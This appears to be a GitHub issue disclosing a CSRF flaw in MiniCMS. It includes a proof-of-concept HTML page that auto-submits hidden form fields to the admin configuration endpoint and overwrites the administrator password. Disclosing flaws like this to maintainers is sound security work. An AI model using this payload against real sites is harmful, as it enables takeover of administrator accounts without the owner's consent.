There is a CSRF vulnerability that can change the administrator account password

Question

There is a CSRF vulnerability that can change the administrator account password

5ecurity opened this issue 7 years ago · 0 comments

After the administrator logged in, open the following page
poc：

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=GB2312">
<title>test</title>
<body>
<form action="http://127.0.0.1/minicms/mc-admin/conf.php" method="post">
<input type="hidden" name="site_name" value="hack123" />  
<input type="hidden" name="site_desc" value="hacktest" />  
<input type="hidden" name="site_link" value="http://127.0.0.1/minicms" />  
<input type="hidden" name="user_nick" value="hack" />  
<input type="hidden" name="user_name" value="admin" />  
<input type="hidden" name="user_pass" value="hackpass" />  
<input type="hidden" name="comment_code" value="" />  
<input type="hidden" name="save" value="保存设置" /> 
</form>
<script>
	document.forms[0].submit();
</script>
</body>
</head>
</html>